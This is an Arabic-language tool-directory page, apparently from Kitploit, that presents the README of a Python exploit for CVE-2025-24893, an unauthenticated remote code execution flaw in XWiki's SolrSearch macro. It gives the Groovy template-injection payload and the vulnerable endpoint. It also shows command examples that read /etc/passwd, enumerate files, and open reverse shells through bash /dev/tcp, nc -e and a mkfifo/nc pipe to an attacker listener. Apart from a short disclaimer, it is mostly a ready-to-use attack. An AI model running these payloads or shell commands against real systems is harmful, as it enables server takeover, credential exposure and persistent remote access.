Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893 — تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في XWiki عبر ماكرو SolrSearch | Kitploit
أدوات/GitHubGitHub/gotr00t0day/cve-2025-24893
الاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubgotr00t0day/cve-2025-24893

CVE-2025-24893

تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في XWiki عبر ماكرو SolrSearch

عرض المستودع
6منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال XWiki SSTI

أداة استغلال مكتوبة بـ Python لثغرة حقن القوالب من جانب الخادم (Server-Side Template Injection - SSTI) في XWiki عبر حقن قالب Groovy في نقطة نهاية SolrSearch.

الثغرة

  • النوع: حقن القوالب من جانب الخادم (Server-Side Template Injection - SSTI)
  • المكوّن: خلاصة RSS الخاصة بـ XWiki SolrSearch
  • الأثر: تنفيذ الأوامر عن بُعد (Remote Code Execution)
  • الإصدار المتأثر: XWiki 15.10.8 (وربما إصدارات أخرى)

المتطلبات

root@kitploit:~
pip3 install requests beautifulsoup4

الاستخدام

اختبار وجود الثغرة

root@kitploit:~
./xwiki_exploit.py -u http://target --test

تنفيذ أمر واحد

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"

قشرة تفاعلية

root@kitploit:~
./xwiki_exploit.py -u http://target.com

سيمنحك هذا قشرة شبه تفاعلية حيث يمكنك تشغيل الأوامر:

root@kitploit:~
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit

وضع التصحيح

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "id" --debug

خيارات سطر الأوامر

  • -u, --url URL: عنوان الهدف (مطلوب)
  • -c, --command CMD: تنفيذ أمر واحد
  • --test: اختبار ما إذا كان الهدف عرضة للثغرة
  • --no-verify-ssl: تعطيل التحقق من شهادة SSL
  • --debug: تفعيل مخرجات التصحيح

أمثلة

جمع المعلومات:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"

البحث عن ملفات مهمة:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"

معلومات الشبكة:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"

إنشاء شل عكسي (Reverse Shell):

root@kitploit:~
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"

التفاصيل التقنية

بنية الحمولة (Payload)

تستخدم الأداة بنية الحمولة التالية لثغرة SSTI:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}

خطوات الاستغلال

  1. يتم ترميز الحمولة باستخدام URL-encoding وإرسالها إلى نقطة النهاية المعرضة للثغرة:

    root@kitploit:~
    /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
    
  2. يقوم الخادم بمعالجة قالب Groovy وتنفيذ الأمر

  3. يتم التقاط المخرجات من استجابة خلاصة RSS بالصيغة:

    root@kitploit:~
    search on [}}OUTPUT]
    
  4. تقوم الأداة بتحليل استجابة HTML لاستخراج مخرجات الأمر

ملاحظات

  • تُنفَّذ الأوامر كمستخدم xwiki (uid=997)
  • دليل العمل هو /usr/lib/xwiki-jetty
  • قد لا تُنتج بعض الأوامر مخرجات إذا فشلت أو عملت في الخلفية
  • بالنسبة للأوامر المعقدة، فكر في استخدام سكربتات شل أو ترميز base64

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدمها فقط على الأنظمة التي لديك إذن باختبارها.

تنزيل الأداة